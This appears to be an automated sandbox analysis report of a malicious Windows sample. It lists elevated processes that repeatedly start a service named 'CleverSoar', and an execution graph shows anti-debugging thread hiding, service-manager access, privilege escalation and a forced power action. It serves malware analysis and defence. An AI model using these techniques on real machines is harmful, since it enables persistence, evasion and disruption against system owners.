                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:99
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:100
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:101
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:102
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:103
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:104
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:105
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:106
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:107
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:108
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:1.9%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:5.1%
                                        Total number of Nodes:742
                                        Total number of Limit Nodes:8
                                        execution_graph 62914 6cd1b8f3 62915 6cd1b905 __dosmaperr 62914->62915 62916 6cd1b91d 62914->62916 62916->62915 62917 6cd1b997 62916->62917 62919 6cd1b968 __dosmaperr 62916->62919 62920 6cd1b9b0 62917->62920 62922 6cd1ba07 __wsopen_s 62917->62922 62923 6cd1b9cb __dosmaperr 62917->62923 62961 6cd0ef40 18 API calls __wsopen_s 62919->62961 62921 6cd1b9b5 62920->62921 62920->62923 62949 6cd20805 62921->62949 62955 6cd135db HeapFree GetLastError _free 62922->62955 62954 6cd0ef40 18 API calls __wsopen_s 62923->62954 62926 6cd1bb5e 62929 6cd1bbd4 62926->62929 62932 6cd1bb77 GetConsoleMode 62926->62932 62927 6cd1ba27 62956 6cd135db HeapFree GetLastError _free 62927->62956 62931 6cd1bbd8 ReadFile 62929->62931 62935 6cd1bbf2 62931->62935 62936 6cd1bc4c GetLastError 62931->62936 62932->62929 62933 6cd1bb88 62932->62933 62933->62931 62937 6cd1bb8e ReadConsoleW 62933->62937 62934 6cd1ba2e 62946 6cd1b9e2 __dosmaperr __wsopen_s 62934->62946 62957 6cd19a89 20 API calls __wsopen_s 62934->62957 62935->62936 62938 6cd1bbc9 62935->62938 62936->62946 62937->62938 62939 6cd1bbaa GetLastError 62937->62939 62942 6cd1bc17 62938->62942 62943 6cd1bc2e 62938->62943 62938->62946 62939->62946 62959 6cd1bd1e 23 API calls 3 library calls 62942->62959 62945 6cd1bc45 62943->62945 62943->62946 62960 6cd1bfd6 21 API calls __wsopen_s 62945->62960 62958 6cd135db HeapFree GetLastError _free 62946->62958 62948 6cd1bc4a 62948->62946 62950 6cd20812 62949->62950 62952 6cd2081f 62949->62952 62950->62926 62951 6cd2082b 62951->62926 62952->62951 62962 6cd0ef40 18 API calls __wsopen_s 62952->62962 62954->62946 62955->62927 62956->62934 62957->62921 62958->62915 62959->62946 62960->62948 62961->62915 62962->62950 62963 6cb9f150 62965 6cb9efbe 62963->62965 62964 6cb9f243 CreateFileA 62968 6cb9f2a7 62964->62968 62965->62964 62966 6cba02ca 62967 6cba02ac GetCurrentProcess TerminateProcess 62967->62966 62968->62966 62968->62967 62969 6cb9f8a3 62970 6cb9f887 62969->62970 62971 6cba02ac GetCurrentProcess TerminateProcess 62970->62971 62972 6cba02ca 62971->62972 62973 6cb83d62 62975 6cb83bc0 62973->62975 62974 6cb83e8a GetCurrentThread NtSetInformationThread 62976 6cb83eea 62974->62976 62975->62974 62977 6cb93b72 62990 6cd05863 62977->62990 62980 6cba639e 63053 6cd0ef50 18 API calls 2 library calls 62980->63053 62986 6cb937e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 62986->62980 63004 6ccf98b0 62986->63004 63010 6cba6ba0 62986->63010 63029 6cba6e60 62986->63029 63039 6cba7090 62986->63039 63052 6cbce010 67 API calls 62986->63052 62992 6cd05868 62990->62992 62991 6cd05882 62991->62986 62992->62991 62995 6cd05884 std::_Facet_Register 62992->62995 63054 6cd0de34 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 62992->63054 62994 6cd066e3 std::_Facet_Register 63058 6cd08199 RaiseException 62994->63058 62995->62994 63055 6cd08199 RaiseException 62995->63055 62997 6cd06edc IsProcessorFeaturePresent 63003 6cd06f01 62997->63003 62999 6cd066a3 63056 6cd08199 RaiseException 62999->63056 63001 6cd066c3 std::invalid_argument::invalid_argument 63057 6cd08199 RaiseException 63001->63057 63003->62986 63005 6ccf98c6 FindFirstFileA 63004->63005 63006 6ccf98c4 63004->63006 63007 6ccf9900 63005->63007 63006->63005 63008 6ccf9949 FindClose 63007->63008 63009 6ccf9960 63007->63009 63008->63007 63009->62986 63011 6cba6bd5 63010->63011 63059 6cbd2020 63011->63059 63013 6cba6c68 63014 6cd05863 std::_Facet_Register 4 API calls 63013->63014 63015 6cba6ca0 63014->63015 63076 6cd06147 63015->63076 63017 6cba6cb4 63088 6cbd1d90 63017->63088 63020 6cba6d8e 63020->62986 63022 6cba6dc8 63096 6cbd26e0 24 API calls 4 library calls 63022->63096 63024 6cba6dda 63097 6cd08199 RaiseException 63024->63097 63026 6cba6def 63098 6cbce010 67 API calls 63026->63098 63028 6cba6e0f 63028->62986 63030 6cba6e9f 63029->63030 63033 6cba6eb3 63030->63033 63488 6cbd3560 32 API calls std::_Xinvalid_argument 63030->63488 63036 6cba6f5b 63033->63036 63490 6cbd2250 30 API calls 63033->63490 63491 6cbd26e0 24 API calls 4 library calls 63033->63491 63492 6cd08199 RaiseException 63033->63492 63035 6cba6f6e 63035->62986 63036->63035 63489 6cbd37e0 32 API calls std::_Xinvalid_argument 63036->63489 63040 6cba709e 63039->63040 63043 6cba70d1 63039->63043 63493 6cbd01f0 63040->63493 63041 6cba7183 63041->62986 63043->63041 63497 6cbd2250 30 API calls 63043->63497 63046 6cd0f938 67 API calls 63046->63043 63047 6cba71ae 63498 6cbd2340 24 API calls 63047->63498 63049 6cba71be 63499 6cd08199 RaiseException 63049->63499 63051 6cba71c9 63052->62986 63054->62992 63055->62999 63056->63001 63057->62994 63058->62997 63060 6cd05863 std::_Facet_Register 4 API calls 63059->63060 63061 6cbd207e 63060->63061 63062 6cd06147 43 API calls 63061->63062 63063 6cbd2092 63062->63063 63099 6cbd2f60 42 API calls 4 library calls 63063->63099 63065 6cbd20c8 63066 6cbd2136 63065->63066 63068 6cbd210d 63065->63068 63101 6cbd2250 30 API calls 63066->63101 63067 6cbd2120 63067->63013 63068->63067 63100 6cd05dae 9 API calls 2 library calls 63068->63100 63071 6cbd215b 63102 6cbd2340 24 API calls 63071->63102 63073 6cbd2171 63103 6cd08199 RaiseException 63073->63103 63075 6cbd217c 63075->63013 63077 6cd06153 __EH_prolog3 63076->63077 63104 6cd05cd5 63077->63104 63082 6cd06171 63118 6cd061da 39 API calls std::locale::_Setgloballocale 63082->63118 63083 6cd061cc 63083->63017 63085 6cd06179 63119 6cd05fd1 HeapFree GetLastError _Yarn ___std_exception_destroy 63085->63119 63087 6cd0618f 63110 6cd05d06 63087->63110 63089 6cbd1ddc 63088->63089 63090 6cba6d5d 63088->63090 63124 6cd06267 63089->63124 63090->63020 63095 6cbd2250 30 API calls 63090->63095 63094 6cbd1e82 63095->63022 63096->63024 63097->63026 63098->63028 63099->63065 63100->63067 63101->63071 63102->63073 63103->63075 63105 6cd05ce4 63104->63105 63106 6cd05ceb 63104->63106 63120 6cd0f1ed 6 API calls std::_Lockit::_Lockit 63105->63120 63107 6cd05ce9 63106->63107 63121 6cd073ab EnterCriticalSection 63106->63121 63107->63087 63117 6cd06050 6 API calls 2 library calls 63107->63117 63111 6cd05d10 63110->63111 63112 6cd0f1fb 63110->63112 63116 6cd05d23 63111->63116 63122 6cd073b9 LeaveCriticalSection 63111->63122 63123 6cd0f1d6 LeaveCriticalSection 63112->63123 63115 6cd0f202 63115->63083 63116->63083 63117->63082 63118->63085 63119->63087 63120->63107 63121->63107 63122->63116 63123->63115 63125 6cd06270 63124->63125 63126 6cbd1dea 63125->63126 63133 6cd0eb6a 63125->63133 63126->63090 63132 6cd0b383 18 API calls __wsopen_s 63126->63132 63128 6cd062bc 63128->63126 63144 6cd0e878 65 API calls 63128->63144 63130 6cd062d7 63130->63126 63145 6cd0f938 63130->63145 63132->63094 63135 6cd0eb75 __wsopen_s 63133->63135 63134 6cd0eb88 63170 6cd0ef40 18 API calls __wsopen_s 63134->63170 63135->63134 63136 6cd0eba8 63135->63136 63143 6cd0eb98 63136->63143 63156 6cd19c2c 63136->63156 63143->63128 63144->63130 63146 6cd0f944 __wsopen_s 63145->63146 63147 6cd0f963 63146->63147 63148 6cd0f94e 63146->63148 63152 6cd0f95e 63147->63152 63351 6cd0b3c9 EnterCriticalSection 63147->63351 63366 6cd0ef40 18 API calls __wsopen_s 63148->63366 63151 6cd0f980 63352 6cd0f9bc 63151->63352 63152->63126 63154 6cd0f98b 63367 6cd0f9b2 LeaveCriticalSection 63154->63367 63157 6cd19c38 __wsopen_s 63156->63157 63172 6cd0f1bf EnterCriticalSection 63157->63172 63159 6cd19c46 63173 6cd19cd0 63159->63173 63164 6cd19d92 63165 6cd19eb1 63164->63165 63197 6cd19f34 63165->63197 63168 6cd0ebec 63171 6cd0ec15 LeaveCriticalSection 63168->63171 63170->63143 63171->63143 63172->63159 63180 6cd19cf3 63173->63180 63174 6cd19c53 63187 6cd19c8c 63174->63187 63175 6cd19d4b 63192 6cd16005 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 63175->63192 63177 6cd19d54 63193 6cd135db HeapFree GetLastError _free 63177->63193 63180->63174 63180->63175 63180->63180 63190 6cd0b3c9 EnterCriticalSection 63180->63190 63191 6cd0b3dd LeaveCriticalSection 63180->63191 63181 6cd19d5d 63181->63174 63194 6cd15a3f 6 API calls std::_Lockit::_Lockit 63181->63194 63183 6cd19d7c 63195 6cd0b3c9 EnterCriticalSection 63183->63195 63186 6cd19d8f 63186->63174 63196 6cd0f1d6 LeaveCriticalSection 63187->63196 63189 6cd0ebc3 63189->63143 63189->63164 63190->63180 63191->63180 63192->63177 63193->63181 63194->63183 63195->63186 63196->63189 63198 6cd19f53 63197->63198 63199 6cd19f66 63198->63199 63203 6cd19f7b 63198->63203 63213 6cd0ef40 18 API calls __wsopen_s 63199->63213 63201 6cd19ec7 63201->63168 63210 6cd22dfe 63201->63210 63208 6cd1a09b 63203->63208 63214 6cd22cc8 37 API calls __wsopen_s 63203->63214 63205 6cd1a0eb 63205->63208 63215 6cd22cc8 37 API calls __wsopen_s 63205->63215 63207 6cd1a109 63207->63208 63216 6cd22cc8 37 API calls __wsopen_s 63207->63216 63208->63201 63217 6cd0ef40 18 API calls __wsopen_s 63208->63217 63218 6cd231b6 63210->63218 63213->63201 63214->63205 63215->63207 63216->63208 63217->63201 63220 6cd231c2 __wsopen_s 63218->63220 63219 6cd231c9 63236 6cd0ef40 18 API calls __wsopen_s 63219->63236 63220->63219 63221 6cd231f4 63220->63221 63227 6cd22e1e 63221->63227 63226 6cd22e19 63226->63168 63238 6cd0f4eb 63227->63238 63233 6cd22e54 63234 6cd22e86 63233->63234 63278 6cd135db HeapFree GetLastError _free 63233->63278 63237 6cd2324b LeaveCriticalSection __wsopen_s 63234->63237 63236->63226 63237->63226 63279 6cd0ab0b 63238->63279 63242 6cd0f50f 63243 6cd0ac16 63242->63243 63288 6cd0ac6e 63243->63288 63245 6cd0ac2e 63245->63233 63246 6cd22e8c 63245->63246 63303 6cd2330c 63246->63303 63252 6cd22ebe __dosmaperr 63252->63233 63253 6cd22fb2 GetFileType 63254 6cd22fbd GetLastError 63253->63254 63260 6cd23004 63253->63260 63332 6cd0e812 __dosmaperr _free 63254->63332 63255 6cd22f87 GetLastError 63255->63252 63257 6cd22f35 63257->63253 63257->63255 63331 6cd23277 CreateFileW 63257->63331 63259 6cd22fcb CloseHandle 63259->63252 63263 6cd22ff4 63259->63263 63333 6cd205d0 SetStdHandle __dosmaperr __wsopen_s 63260->63333 63261 6cd22f7a 63261->63253 63261->63255 63263->63252 63264 6cd23025 63265 6cd23071 63264->63265 63334 6cd23486 70 API calls 2 library calls 63264->63334 63269 6cd23078 63265->63269 63348 6cd23530 70 API calls 2 library calls 63265->63348 63268 6cd230a6 63268->63269 63270 6cd230b4 63268->63270 63335 6cd1a745 63269->63335 63270->63252 63272 6cd23130 CloseHandle 63270->63272 63349 6cd23277 CreateFileW 63272->63349 63274 6cd2315b 63274->63263 63275 6cd23165 GetLastError 63274->63275 63276 6cd23171 __dosmaperr 63275->63276 63350 6cd2053f SetStdHandle __dosmaperr __wsopen_s 63276->63350 63278->63234 63280 6cd0ab22 63279->63280 63281 6cd0ab2b 63279->63281 63280->63242 63287 6cd157f5 5 API calls std::_Lockit::_Lockit 63280->63287 63281->63280 63282 6cd137d2 __Getctype 37 API calls 63281->63282 63283 6cd0ab4b 63282->63283 63284 6cd13d48 __Getctype 37 API calls 63283->63284 63285 6cd0ab61 63284->63285 63286 6cd13d75 __fassign 37 API calls 63285->63286 63286->63280 63287->63242 63289 6cd0ac96 63288->63289 63290 6cd0ac7c 63288->63290 63292 6cd0acbc 63289->63292 63293 6cd0ac9d 63289->63293 63291 6cd0abfc __wsopen_s HeapFree GetLastError 63290->63291 63294 6cd0ac86 __dosmaperr 63291->63294 63295 6cd13663 __fassign MultiByteToWideChar 63292->63295 63293->63294 63296 6cd0abbd __wsopen_s HeapFree GetLastError 63293->63296 63294->63245 63297 6cd0accb 63295->63297 63296->63294 63298 6cd0acd2 GetLastError 63297->63298 63299 6cd0abbd __wsopen_s HeapFree GetLastError 63297->63299 63301 6cd0acf8 63297->63301 63298->63294 63299->63301 63300 6cd13663 __fassign MultiByteToWideChar 63302 6cd0ad0f 63300->63302 63301->63294 63301->63300 63302->63294 63302->63298 63304 6cd2332d 63303->63304 63306 6cd23347 63303->63306 63304->63306 63307 6cd0ef40 __wsopen_s 18 API calls 63304->63307 63305 6cd2329c __wsopen_s 18 API calls 63310 6cd2337f 63305->63310 63306->63305 63307->63306 63308 6cd233ae 63309 6cd24731 __wsopen_s 18 API calls 63308->63309 63315 6cd22ea9 63308->63315 63311 6cd233fc 63309->63311 63310->63308 63313 6cd0ef40 __wsopen_s 18 API calls 63310->63313 63312 6cd23479 63311->63312 63311->63315 63314 6cd0ef6d __Getctype 11 API calls 63312->63314 63313->63308 63316 6cd23485 63314->63316 63315->63252 63317 6cd2042c 63315->63317 63318 6cd20438 __wsopen_s 63317->63318 63319 6cd0f1bf std::_Lockit::_Lockit EnterCriticalSection 63318->63319 63322 6cd2043f 63319->63322 63320 6cd20486 63323 6cd20536 __wsopen_s LeaveCriticalSection 63320->63323 63321 6cd20464 63324 6cd20662 __wsopen_s 11 API calls 63321->63324 63322->63320 63322->63321 63327 6cd204d3 EnterCriticalSection 63322->63327 63325 6cd204a6 63323->63325 63326 6cd20469 63324->63326 63325->63252 63330 6cd23277 CreateFileW 63325->63330 63326->63320 63328 6cd207b0 __wsopen_s EnterCriticalSection 63326->63328 63327->63320 63329 6cd204e0 LeaveCriticalSection 63327->63329 63328->63320 63329->63322 63330->63257 63331->63261 63332->63259 63333->63264 63334->63265 63336 6cd203c2 __wsopen_s 18 API calls 63335->63336 63338 6cd1a755 63336->63338 63337 6cd1a75b 63340 6cd2053f __wsopen_s SetStdHandle 63337->63340 63338->63337 63339 6cd1a78d 63338->63339 63341 6cd203c2 __wsopen_s 18 API calls 63338->63341 63339->63337 63342 6cd203c2 __wsopen_s 18 API calls 63339->63342 63347 6cd1a7b3 __dosmaperr 63340->63347 63343 6cd1a784 63341->63343 63344 6cd1a799 CloseHandle 63342->63344 63345 6cd203c2 __wsopen_s 18 API calls 63343->63345 63344->63337 63346 6cd1a7a5 GetLastError 63344->63346 63345->63339 63346->63337 63347->63252 63348->63268 63349->63274 63350->63263 63351->63151 63353 6cd0f9c9 63352->63353 63354 6cd0f9de 63352->63354 63390 6cd0ef40 18 API calls __wsopen_s 63353->63390 63364 6cd0f9d9 63354->63364 63368 6cd0fad9 63354->63368 63361 6cd0fa01 63383 6cd1a6b8 63361->63383 63363 6cd0fa07 63363->63364 63391 6cd135db HeapFree GetLastError _free 63363->63391 63364->63154 63366->63152 63367->63152 63369 6cd0faf1 63368->63369 63370 6cd0f9f3 63368->63370 63369->63370 63371 6cd18a80 18 API calls 63369->63371 63374 6cd1755e 63370->63374 63372 6cd0fb0f 63371->63372 63392 6cd1a98c 63372->63392 63375 6cd17575 63374->63375 63376 6cd0f9fb 63374->63376 63375->63376 63475 6cd135db HeapFree GetLastError _free 63375->63475 63378 6cd18a80 63376->63378 63379 6cd18aa1 63378->63379 63380 6cd18a8c 63378->63380 63379->63361 63476 6cd0ef40 18 API calls __wsopen_s 63380->63476 63382 6cd18a9c 63382->63361 63384 6cd1a6de 63383->63384 63388 6cd1a6c9 __dosmaperr 63383->63388 63385 6cd1a705 63384->63385 63387 6cd1a727 __dosmaperr 63384->63387 63477 6cd1a7e1 63385->63477 63485 6cd0ef40 18 API calls __wsopen_s 63387->63485 63388->63363 63390->63364 63391->63364 63393 6cd1a998 __wsopen_s 63392->63393 63394 6cd1a9ea 63393->63394 63396 6cd1aa53 __dosmaperr 63393->63396 63402 6cd1a9a0 __dosmaperr 63393->63402 63403 6cd207b0 EnterCriticalSection 63394->63403 63433 6cd0ef40 18 API calls __wsopen_s 63396->63433 63397 6cd1a9f0 63400 6cd1aa0c __dosmaperr 63397->63400 63404 6cd1aa7e 63397->63404 63432 6cd1aa4b LeaveCriticalSection __wsopen_s 63400->63432 63402->63370 63403->63397 63405 6cd1aaa0 63404->63405 63431 6cd1aabc __dosmaperr 63404->63431 63406 6cd1aaf4 63405->63406 63407 6cd1aaa4 __dosmaperr 63405->63407 63408 6cd1ab07 63406->63408 63442 6cd19a89 20 API calls __wsopen_s 63406->63442 63441 6cd0ef40 18 API calls __wsopen_s 63407->63441 63434 6cd1ac60 63408->63434 63413 6cd1ab1d 63415 6cd1ab21 63413->63415 63416 6cd1ab46 63413->63416 63414 6cd1ab5c 63417 6cd1ab70 63414->63417 63418 6cd1abb5 WriteFile 63414->63418 63415->63431 63443 6cd1b07b 6 API calls __wsopen_s 63415->63443 63444 6cd1acd1 43 API calls 5 library calls 63416->63444 63421 6cd1aba5 63417->63421 63422 6cd1ab7b 63417->63422 63420 6cd1abd9 GetLastError 63418->63420 63418->63431 63420->63431 63447 6cd1b0e3 7 API calls 2 library calls 63421->63447 63425 6cd1ab80 63422->63425 63426 6cd1ab95 63422->63426 63427 6cd1ab85 63425->63427 63425->63431 63446 6cd1b2a7 8 API calls 3 library calls 63426->63446 63445 6cd1b1be 7 API calls 2 library calls 63427->63445 63429 6cd1ab93 63429->63431 63431->63400 63432->63402 63433->63402 63435 6cd20805 __wsopen_s 18 API calls 63434->63435 63437 6cd1ac71 63435->63437 63436 6cd1ab18 63436->63413 63436->63414 63437->63436 63448 6cd137d2 GetLastError 63437->63448 63440 6cd1acae GetConsoleMode 63440->63436 63441->63431 63442->63408 63443->63431 63444->63431 63445->63429 63446->63429 63447->63429 63449 6cd137e9 63448->63449 63453 6cd137ef 63448->63453 63451 6cd15943 __Getctype 6 API calls 63449->63451 63450 6cd15982 __Getctype 6 API calls 63452 6cd1380d 63450->63452 63451->63453 63454 6cd13811 63452->63454 63455 6cd137f5 SetLastError 63452->63455 63453->63450 63453->63455 63456 6cd16005 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 63454->63456 63461 6cd13883 63455->63461 63462 6cd13889 63455->63462 63458 6cd1381d 63456->63458 63459 6cd13825 63458->63459 63460 6cd1383c 63458->63460 63463 6cd15982 __Getctype 6 API calls 63459->63463 63465 6cd15982 __Getctype 6 API calls 63460->63465 63461->63436 63461->63440 63464 6cd0f8e9 __Getctype 35 API calls 63462->63464 63467 6cd13833 63463->63467 63468 6cd1388e 63464->63468 63466 6cd13848 63465->63466 63469 6cd1385d 63466->63469 63470 6cd1384c 63466->63470 63472 6cd135db _free HeapFree GetLastError 63467->63472 63474 6cd135db _free HeapFree GetLastError 63469->63474 63471 6cd15982 __Getctype 6 API calls 63470->63471 63471->63467 63473 6cd13839 63472->63473 63473->63455 63474->63473 63475->63376 63476->63382 63478 6cd1a7ed __wsopen_s 63477->63478 63486 6cd207b0 EnterCriticalSection 63478->63486 63480 6cd1a7fb 63481 6cd1a745 __wsopen_s 21 API calls 63480->63481 63482 6cd1a828 63480->63482 63481->63482 63487 6cd1a861 LeaveCriticalSection __wsopen_s 63482->63487 63484 6cd1a84a 63484->63388 63485->63388 63486->63480 63487->63484 63488->63033 63489->63035 63490->63033 63491->63033 63492->63033 63494 6cbd022e 63493->63494 63495 6cba70c4 63494->63495 63500 6cd105fb 63494->63500 63495->63046 63497->63047 63498->63049 63499->63051 63501 6cd10626 63500->63501 63502 6cd10609 63500->63502 63501->63494 63502->63501 63503 6cd10616 63502->63503 63504 6cd1062a 63502->63504 63516 6cd0ef40 18 API calls __wsopen_s 63503->63516 63508 6cd10822 63504->63508 63509 6cd1082e __wsopen_s 63508->63509 63517 6cd0b3c9 EnterCriticalSection 63509->63517 63511 6cd1083c 63518 6cd107df 63511->63518 63515 6cd1065c 63515->63494 63516->63501 63517->63511 63526 6cd173c6 63518->63526 63524 6cd10819 63525 6cd10871 LeaveCriticalSection 63524->63525 63525->63515 63527 6cd18a80 18 API calls 63526->63527 63528 6cd173d7 63527->63528 63529 6cd20805 __wsopen_s 18 API calls 63528->63529 63530 6cd173dd __wsopen_s 63529->63530 63531 6cd107f3 63530->63531 63543 6cd135db HeapFree GetLastError _free 63530->63543 63533 6cd1065e 63531->63533 63535 6cd10670 63533->63535 63537 6cd1068e 63533->63537 63534 6cd1067e 63544 6cd0ef40 18 API calls __wsopen_s 63534->63544 63535->63534 63535->63537 63540 6cd106a6 _Yarn 63535->63540 63542 6cd17479 62 API calls 63537->63542 63538 6cd0fad9 62 API calls 63538->63540 63539 6cd18a80 18 API calls 63539->63540 63540->63537 63540->63538 63540->63539 63541 6cd1a98c __wsopen_s 62 API calls 63540->63541 63541->63540 63542->63524 63543->63531 63544->63537 63545 6cb84b53 63546 6cd05863 std::_Facet_Register 4 API calls 63545->63546 63547 6cb84b5c _Yarn 63546->63547 63548 6ccf98b0 2 API calls 63547->63548 63553 6cb84bae std::ios_base::_Ios_base_dtor 63548->63553 63549 6cba639e 63749 6cd0ef50 18 API calls 2 library calls 63549->63749 63551 6cb84cff 63552 6cb85164 CreateFileA CloseHandle 63557 6cb851ec 63552->63557 63553->63549 63553->63551 63553->63552 63554 6cb9245a _Yarn _strlen 63553->63554 63554->63549 63555 6ccf98b0 2 API calls 63554->63555 63558 6cb92a83 std::ios_base::_Ios_base_dtor 63555->63558 63703 6cd03f30 OpenSCManagerA 63557->63703 63558->63549 63707 6cceeff0 63558->63707 63559 6cba63b2 63750 6cb815e0 18 API calls std::ios_base::_Ios_base_dtor 63559->63750 63560 6cb8fc00 63741 6cd04050 CreateToolhelp32Snapshot 63560->63741 63564 6cd05863 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63599 6cb85478 std::ios_base::_Ios_base_dtor _Yarn _strlen 63564->63599 63566 6cb937d0 Sleep 63609 6cb937e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 63566->63609 63567 6ccf98b0 2 API calls 63567->63599 63568 6cd04050 4 API calls 63584 6cb9053a 63568->63584 63569 6cd04050 4 API calls 63594 6cb912e2 63569->63594 63571 6cba64f8 63572 6cb8ffe3 63572->63568 63578 6cb90abc 63572->63578 63573 6cba6ba0 104 API calls 63573->63599 63574 6cba6e60 32 API calls 63574->63599 63576 6cba7090 77 API calls 63576->63599 63577 6cd04050 4 API calls 63577->63578 63578->63554 63578->63569 63579 6cd04050 4 API calls 63598 6cb91dd9 63579->63598 63580 6cb9211c 63580->63554 63582 6cb9241a 63580->63582 63585 6cceeff0 11 API calls 63582->63585 63583 6ccf98b0 2 API calls 63583->63609 63584->63577 63584->63578 63587 6cb9244d 63585->63587 63586 6cb86722 63717 6cd00900 25 API calls 4 library calls 63586->63717 63747 6cd04b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63587->63747 63589 6cb92452 Sleep 63589->63554 63590 6cb916ac 63591 6cb86162 63593 6cb8740b 63718 6cd03e00 CreateProcessA 63593->63718 63594->63579 63594->63580 63594->63590 63595 6cd04050 4 API calls 63595->63580 63596 6cba6ba0 104 API calls 63596->63609 63597 6cba6e60 32 API calls 63597->63609 63598->63580 63598->63595 63599->63549 63599->63560 63599->63564 63599->63567 63599->63573 63599->63574 63599->63576 63599->63586 63599->63591 63716 6cbce010 67 API calls 63599->63716 63600 6cba7090 77 API calls 63600->63609 63602 6cb8775a _strlen 63602->63549 63603 6cb87ba9 63602->63603 63604 6cb87b92 63602->63604 63607 6cb87b43 _Yarn 63602->63607 63606 6cd05863 std::_Facet_Register 4 API calls 63603->63606 63605 6cd05863 std::_Facet_Register 4 API calls 63604->63605 63605->63607 63606->63607 63608 6ccf98b0 2 API calls 63607->63608 63617 6cb87be7 std::ios_base::_Ios_base_dtor 63608->63617 63609->63549 63609->63583 63609->63596 63609->63597 63609->63600 63748 6cbce010 67 API calls 63609->63748 63610 6cd03e00 4 API calls 63621 6cb88a07 63610->63621 63611 6cb89d68 63613 6cd05863 std::_Facet_Register 4 API calls 63611->63613 63612 6cb89d7f 63614 6cd05863 std::_Facet_Register 4 API calls 63612->63614 63615 6cb89d18 _Yarn 63613->63615 63614->63615 63616 6ccf98b0 2 API calls 63615->63616 63625 6cb89dbd std::ios_base::_Ios_base_dtor 63616->63625 63617->63549 63617->63610 63618 6cb8962c _strlen 